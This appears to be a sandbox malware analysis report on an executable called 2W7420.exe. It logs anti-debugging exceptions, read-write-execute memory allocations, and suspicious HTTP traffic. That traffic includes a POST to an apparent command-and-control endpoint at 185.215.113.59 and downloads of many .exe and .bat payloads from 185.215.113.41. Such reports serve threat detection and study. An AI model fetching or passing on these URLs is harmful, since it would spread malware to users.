__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 68 31 40 ff 28 89 34 24 be 00 69 31 7f 53 e9 exception.symbol: 2w7420+0x1e8f34 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2002740 exception.address: 0x14d8f34 registers.esp: 4062848 registers.edi: 134889 registers.eax: 21858476 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 26522468 registers.esi: 10 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 55 89 0c 24 b9 00 a2 e6 3f e9 a4 01 00 00 68 exception.symbol: 2w7420+0x1e8a79 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2001529 exception.address: 0x14d8a79 registers.esp: 4062852 registers.edi: 47200 registers.eax: 21861276 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 26522468 registers.esi: 0 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 8a ee e9 12 00 00 00 96 f2 c1 c5 65 exception.symbol: 2w7420+0x1e959f exception.instruction: int 1 exception.module: 2W7420.exe exception.exception_code: 0xc0000005 exception.offset: 2004383 exception.address: 0x14d959f registers.esp: 4062812 registers.edi: 0 registers.eax: 4062812 registers.ebp: 4010274836 registers.edx: 21862055 registers.ebx: 21862055 registers.esi: 0 registers.ecx: 24832	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 55 c7 04 24 7e a4 f6 7e 81 0c 24 78 9b ff 6f exception.symbol: 2w7420+0x1f8364 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2065252 exception.address: 0x14e8364 registers.esp: 4062852 registers.edi: 20251866 registers.eax: 28494 registers.ebp: 4010274836 registers.edx: 6 registers.ebx: 26522687 registers.esi: 1971262480 registers.ecx: 21950506	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 55 89 04 24 55 e9 9a fb ff ff 81 e9 9a 88 f7 exception.symbol: 2w7420+0x1f86b5 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2066101 exception.address: 0x14e86b5 registers.esp: 4062852 registers.edi: 20251866 registers.eax: 4294941900 registers.ebp: 4010274836 registers.edx: 2298801283 registers.ebx: 26522687 registers.esi: 1971262480 registers.ecx: 21950506	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 23 04 00 00 53 89 14 24 53 c7 04 24 ec 39 exception.symbol: 2w7420+0x1fa91b exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2074907 exception.address: 0x14ea91b registers.esp: 4062848 registers.edi: 3996316878 registers.eax: 21931424 registers.ebp: 4010274836 registers.edx: 611634223 registers.ebx: 92830 registers.esi: 1991514346 registers.ecx: 633563838	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 e4 01 00 00 55 e9 f2 01 00 00 5b 8f 04 24 exception.symbol: 2w7420+0x1fa737 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2074423 exception.address: 0x14ea737 registers.esp: 4062852 registers.edi: 3996316878 registers.eax: 21960782 registers.ebp: 4010274836 registers.edx: 611634223 registers.ebx: 92830 registers.esi: 1991514346 registers.ecx: 633563838	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 52 50 55 89 3c 24 bf 1b 3f de 73 e9 68 ff ff exception.symbol: 2w7420+0x1fa701 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2074369 exception.address: 0x14ea701 registers.esp: 4062852 registers.edi: 262633 registers.eax: 21934302 registers.ebp: 4010274836 registers.edx: 611634223 registers.ebx: 92830 registers.esi: 0 registers.ecx: 633563838	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 04 fd ff ff 55 51 54 8f 04 24 e9 exception.symbol: 2w7420+0x1fd8f0 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2087152 exception.address: 0x14ed8f0 registers.esp: 4062844 registers.edi: 262633 registers.eax: 27090 registers.ebp: 4010274836 registers.edx: 611634223 registers.ebx: 92830 registers.esi: 21970651 registers.ecx: 633563838	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 50 e9 7f 03 00 00 5c 89 14 24 ba 82 f7 3f 7f exception.symbol: 2w7420+0x1fdab7 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2087607 exception.address: 0x14edab7 registers.esp: 4062844 registers.edi: 262633 registers.eax: 27090 registers.ebp: 4010274836 registers.edx: 611634223 registers.ebx: 205545 registers.esi: 21946311 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 29 c9 ff 34 0a e9 4f fe ff ff 8b 14 24 52 54 exception.symbol: 2w7420+0x201680 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2102912 exception.address: 0x14f1680 registers.esp: 4062844 registers.edi: 262633 registers.eax: 27385 registers.ebp: 4010274836 registers.edx: 21986164 registers.ebx: 205545 registers.esi: 21946311 registers.ecx: 666380577	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 53 bb 74 b0 df 79 52 ba b2 aa fa 6f f7 da e9 exception.symbol: 2w7420+0x2016dd exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2103005 exception.address: 0x14f16dd registers.esp: 4062844 registers.edi: 262633 registers.eax: 27385 registers.ebp: 4010274836 registers.edx: 21986164 registers.ebx: 205545 registers.esi: 1984793192 registers.ecx: 4294942432	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 1e ff 34 24 ff 34 24 ff 34 24 e9 exception.symbol: 2w7420+0x21080b exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2164747 exception.address: 0x150080b registers.esp: 4062844 registers.edi: 2908575910 registers.eax: 26303 registers.ebp: 4010274836 registers.edx: 1149356700 registers.ebx: 22046850 registers.esi: 734438733 registers.ecx: 2152578265	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 56 81 ec 04 00 00 00 89 24 24 81 04 24 04 00 exception.symbol: 2w7420+0x2103d5 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2163669 exception.address: 0x15003d5 registers.esp: 4062844 registers.edi: 2908575910 registers.eax: 26303 registers.ebp: 4010274836 registers.edx: 116969 registers.ebx: 22046850 registers.esi: 4294943544 registers.ecx: 2152578265	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 56 68 4d 85 e5 2f 5e e9 7e 02 00 00 29 c2 58 exception.symbol: 2w7420+0x225822 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2250786 exception.address: 0x1515822 registers.esp: 4062808 registers.edi: 2130516531 registers.eax: 26593 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 22106547 registers.esi: 22102424 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 51 e9 27 fd ff ff 5a f7 d8 c1 e0 07 57 bf b6 exception.symbol: 2w7420+0x22563c exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2250300 exception.address: 0x151563c registers.esp: 4062812 registers.edi: 2130516531 registers.eax: 26593 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 22133140 registers.esi: 22102424 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 2d 00 00 00 56 be a7 e6 fe 27 53 bb b2 e9 exception.symbol: 2w7420+0x225a59 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2251353 exception.address: 0x1515a59 registers.esp: 4062812 registers.edi: 452704 registers.eax: 26593 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 22109644 registers.esi: 0 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 68 47 73 7c 04 89 2c 24 e9 4a exception.symbol: 2w7420+0x227c21 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2260001 exception.address: 0x1517c21 registers.esp: 4062808 registers.edi: 22116331 registers.eax: 30993 registers.ebp: 4010274836 registers.edx: 1619599480 registers.ebx: 1610776832 registers.esi: 27352579 registers.ecx: 1641713947	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 53 e9 77 05 00 00 81 ce b4 fa bf 67 81 f6 b0 exception.symbol: 2w7420+0x227915 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2259221 exception.address: 0x1517915 registers.esp: 4062812 registers.edi: 22147324 registers.eax: 30993 registers.ebp: 4010274836 registers.edx: 4294938892 registers.ebx: 1610776832 registers.esi: 27352579 registers.ecx: 360407912	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 50 68 1b 47 f6 7b 8b 04 24 e9 46 00 00 00 68 exception.symbol: 2w7420+0x2284c6 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2262214 exception.address: 0x15184c6 registers.esp: 4062812 registers.edi: 4294941084 registers.eax: 1653410144 registers.ebp: 4010274836 registers.edx: 1599218055 registers.ebx: 22148172 registers.esi: 27352579 registers.ecx: 1692676579	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 53 c7 04 24 9c 92 69 35 89 0c 24 b9 22 cf d2 exception.symbol: 2w7420+0x22f538 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2291000 exception.address: 0x151f538 registers.esp: 4062808 registers.edi: 22145400 registers.eax: 26424 registers.ebp: 4010274836 registers.edx: 0 registers.ebx: 4294966172 registers.esi: 5233039 registers.ecx: 22143504	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 52 89 0c 24 b9 19 52 3f 77 89 cb e9 26 fc ff exception.symbol: 2w7420+0x22f4ff exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2290943 exception.address: 0x151f4ff registers.esp: 4062812 registers.edi: 22148692 registers.eax: 26424 registers.ebp: 4010274836 registers.edx: 0 registers.ebx: 0 registers.esi: 9103698 registers.ecx: 22143504	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 52 e9 00 00 00 00 81 ec 04 00 00 00 89 3c 24 exception.symbol: 2w7420+0x23002f exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2293807 exception.address: 0x152002f registers.esp: 4062812 registers.edi: 22148692 registers.eax: 32258 registers.ebp: 4010274836 registers.edx: 71145 registers.ebx: 4294937880 registers.esi: 9103698 registers.ecx: 22181330	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 56 89 e6 53 bb e6 70 df 7f 81 f3 38 0b e5 7f exception.symbol: 2w7420+0x232aa1 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2304673 exception.address: 0x1522aa1 registers.esp: 4062812 registers.edi: 604292944 registers.eax: 4294939036 registers.ebp: 4010274836 registers.edx: 22190652 registers.ebx: 211131136 registers.esi: 9103698 registers.ecx: 22181330	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 6d 03 00 00 8b 1c 24 57 e9 c6 ff exception.symbol: 2w7420+0x23640d exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2319373 exception.address: 0x152640d registers.esp: 4062812 registers.edi: 22178877 registers.eax: 27919 registers.ebp: 4010274836 registers.edx: 849461110 registers.ebx: 0 registers.esi: 44338258 registers.ecx: 81129	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 44 02 00 00 59 e9 a8 02 00 00 01 f8 e9 e3 exception.symbol: 2w7420+0x23c68f exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2344591 exception.address: 0x152c68f registers.esp: 4062808 registers.edi: 22178877 registers.eax: 31556 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 22182236 registers.ecx: 22201831	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 aa 02 db 3b 89 14 24 56 50 b8 7f exception.symbol: 2w7420+0x23cbc7 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2345927 exception.address: 0x152cbc7 registers.esp: 4062812 registers.edi: 22178877 registers.eax: 31556 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 22182236 registers.ecx: 22233387	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 ef fb ff ff 33 3c 24 e9 exception.symbol: 2w7420+0x23cd3d exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2346301 exception.address: 0x152cd3d registers.esp: 4062812 registers.edi: 3457329000 registers.eax: 0 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 22182236 registers.ecx: 22204887	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 29 c0 ff 34 10 ff 34 24 ff 34 24 8b 1c 24 e9 exception.symbol: 2w7420+0x24f6d1 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2422481 exception.address: 0x153f6d1 registers.esp: 4062812 registers.edi: 22256008 registers.eax: 26375 registers.ebp: 4010274836 registers.edx: 22304469 registers.ebx: 1969225702 registers.esi: 22231526 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 14 24 e9 22 01 00 00 5f 01 c1 58 exception.symbol: 2w7420+0x24f0d0 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2420944 exception.address: 0x153f0d0 registers.esp: 4062812 registers.edi: 22256008 registers.eax: 4294943400 registers.ebp: 4010274836 registers.edx: 22304469 registers.ebx: 1340866664 registers.esi: 22231526 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 04 24 c7 04 24 7f 4b fd 6e 81 34 exception.symbol: 2w7420+0x25a073 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2465907 exception.address: 0x154a073 registers.esp: 4062812 registers.edi: 22353185 registers.eax: 32297 registers.ebp: 4010274836 registers.edx: 2219384 registers.ebx: 22282050 registers.esi: 61718508 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 51 89 e1 81 c1 04 00 00 00 81 e9 04 00 00 00 exception.symbol: 2w7420+0x2598b0 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2463920 exception.address: 0x15498b0 registers.esp: 4062812 registers.edi: 22323417 registers.eax: 32297 registers.ebp: 4010274836 registers.edx: 0 registers.ebx: 22282050 registers.esi: 605849937 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 68 cc 15 2f 2b 89 0c 24 e9 c3 fa ff ff f7 de exception.symbol: 2w7420+0x261b50 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2497360 exception.address: 0x1551b50 registers.esp: 4062808 registers.edi: 22323417 registers.eax: 30947 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 842529331 registers.esi: 22352475 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 55 e9 bb 00 00 00 89 de 5b 5d 89 f0 5e 68 f6 exception.symbol: 2w7420+0x2616a3 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2496163 exception.address: 0x15516a3 registers.esp: 4062812 registers.edi: 22323417 registers.eax: 30947 registers.ebp: 4010274836 registers.edx: 2130566132 registers.ebx: 842529331 registers.esi: 22383422 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 68 55 4f 5f 14 89 34 24 52 89 34 24 89 0c 24 exception.symbol: 2w7420+0x2613a1 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2495393 exception.address: 0x15513a1 registers.esp: 4062812 registers.edi: 22323417 registers.eax: 4294939388 registers.ebp: 4010274836 registers.edx: 605325648 registers.ebx: 842529331 registers.esi: 22383422 registers.ecx: 1308426240	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 0e f8 ff ff 31 f9 5f 53 e9 e1 f7 ff ff be exception.symbol: 2w7420+0x26fc37 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 2554935 exception.address: 0x155fc37 registers.esp: 4062808 registers.edi: 2001 registers.eax: 29728 registers.ebp: 4010274836 registers.edx: 8 registers.ebx: 22380674 registers.esi: 22410205 registers.ecx: 9	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (11 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.59/Dy5h4kus/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/7709196889/hvof1h0.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/ebash/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/7453936223/LAc2heq.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6691015685/xztOH3r.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/7881515133/690BRuM.bat
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/5561582465/235T1TS.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6350437481/lBiQciH.exe

Performs some HTTP requests (11 events)

request	POST http://185.215.113.59/Dy5h4kus/index.php
request	GET http://185.215.113.41/files/7709196889/hvof1h0.exe
request	GET http://185.215.113.41/files/ebash/random.exe
request	GET http://185.215.113.41/files/7453936223/LAc2heq.exe
request	GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
request	GET http://185.215.113.41/files/6691015685/xztOH3r.exe
request	GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
request	GET http://185.215.113.41/files/7881515133/690BRuM.bat
request	GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
request	GET http://185.215.113.41/files/5561582465/235T1TS.exe
request	GET http://185.215.113.41/files/6350437481/lBiQciH.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.59/Dy5h4kus/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 108 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00fc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:53 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 180224 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x012f1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x042f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04300000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04310000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 10 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fa1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76d71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fa1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 10:01 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76d71000 process_handle: 0xffffffff	1
